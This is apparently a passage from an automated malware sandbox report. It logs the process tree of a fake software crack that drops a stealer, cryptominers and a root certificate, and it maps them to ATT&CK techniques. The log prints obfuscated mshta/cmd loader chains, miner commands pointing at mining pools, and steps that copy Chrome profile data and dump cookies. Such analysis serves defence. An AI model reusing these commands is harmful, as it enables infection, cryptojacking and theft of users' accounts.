                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7708 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:4924
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7336 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:4640
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3532 /prefetch:2
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:1592
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                1⤵
                                                                                                                                  PID:1864
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:1452
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                  1⤵
                                                                                                                                    PID:1356
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                    1⤵
                                                                                                                                      PID:1212
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                      1⤵
                                                                                                                                        PID:1152
                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                        1⤵
                                                                                                                                          PID:1060
                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                          1⤵
                                                                                                                                            PID:364
                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:3260
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                              2⤵
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              • Modifies registry class
                                                                                                                                              PID:4936
                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:4324
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.crack.zip\Phatnoise.Music.Manager.all.ve.crack.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.crack.zip\Phatnoise.Music.Manager.all.ve.crack.exe"
                                                                                                                                              1⤵
                                                                                                                                                PID:4792
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3992
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                      keygen-pr.exe -p83fsase3Ge
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:1180
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:5000
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                          5⤵
                                                                                                                                                            PID:4972
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                        keygen-step-1.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4312
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                        keygen-step-5.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4584
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if """"== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4748
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                              5⤵
                                                                                                                                                                PID:2764
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Ehmj.exe
                                                                                                                                                                  Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:764
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""-P85DVJ_N_WA39dHAGmL0E~ ""== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:4560
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if "-P85DVJ_N_WA39dHAGmL0E~ "== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:3160
                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                        "C:\Windows\System32\regsvr32.exe" /U -s .\YFDBQ.T
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                        PID:4624
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill -IM "keygen-step-5.exe" -F
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4732
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                keygen-step-2.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                PID:5116
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\E6B7.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\E6B7.tmp.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  PID:4124
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\E6B7.tmp.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:1412
                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                        PID:376
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2272
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4748
                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                          PID:4496
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                      keygen-step-3.exe
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4468
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:4408
                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                            ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:2276
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                        keygen-step-4.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4812
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:3292
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:200
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4364
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\EEF5.tmp.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\EEF5.tmp.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:4468
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\EEF5.tmp.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\EEF5.tmp.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:4544
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\F0CA.tmp.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\F0CA.tmp.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:60
                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                              -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w13053 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                              PID:4384
                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w10496@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:3732
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:5028
                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                  PID:4840
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Drops Chrome extension
                                                                                                                                                                              PID:4836
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:4916
                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    PID:2200
                                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                  xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                  PID:4260
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:4344
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffaf7b24f50,0x7ffaf7b24f60,0x7ffaf7b24f70
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:1896
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,4370215653941383745,8791240267438137191,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2196 /prefetch:8
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:1480
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,4370215653941383745,8791240267438137191,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:1668
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,4370215653941383745,8791240267438137191,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:3840
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,4370215653941383745,8791240267438137191,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1688 /prefetch:8
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:4660
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1628,4370215653941383745,8791240267438137191,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1640 /prefetch:2
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:4336
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,4370215653941383745,8791240267438137191,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:4640
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,4370215653941383745,8791240267438137191,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4500
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,4370215653941383745,8791240267438137191,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:4916
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,4370215653941383745,8791240267438137191,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:4572
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  PID:3668
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:960
                                                                                                                                                                                                  • C:\ProgramData\3245233.exe
                                                                                                                                                                                                    "C:\ProgramData\3245233.exe"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    PID:1872
                                                                                                                                                                                                  • C:\ProgramData\8826448.exe
                                                                                                                                                                                                    "C:\ProgramData\8826448.exe"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                    PID:3984
                                                                                                                                                                                                    • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                      "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:1484
                                                                                                                                                                                                  • C:\ProgramData\7991547.exe
                                                                                                                                                                                                    "C:\ProgramData\7991547.exe"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:2804
                                                                                                                                                                                                    • C:\ProgramData\7991547.exe
                                                                                                                                                                                                      "{path}"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:2796
                                                                                                                                                                                                  • C:\ProgramData\4643375.exe
                                                                                                                                                                                                    "C:\ProgramData\4643375.exe"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    PID:2240
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                  PID:3728
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:2184
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    PID:200
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    PID:2212
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    PID:4784

                                                                                                                                                                                          Network

                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                          Persistence

                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                          1
                                                                                                                                                                                          T1060

                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                          2
                                                                                                                                                                                          T1112

                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                          1
                                                                                                                                                                                          T1130

                                                                                                                                                                                          Credential Access

                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                          4
                                                                                                                                                                                          T1081

                                                                                                                                                                                          Discovery

                                                                                                                                                                                          Query Registry

                                                                                                                                                                                          3
                                                                                                                                                                                          T1012

                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                          4
                                                                                                                                                                                          T1082

                                                                                                                                                                                          Remote System Discovery

                                                                                                                                                                                          1
                                                                                                                                                                                          T1018

                                                                                                                                                                                          Collection

                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                          4
                                                                                                                                                                                          T1005

                                                                                                                                                                                          Command and Control

                                                                                                                                                                                          Web Service

                                                                                                                                                                                          1
                                                                                                                                                                                          T1102

                                                                                                                                                                                          Replay Monitor

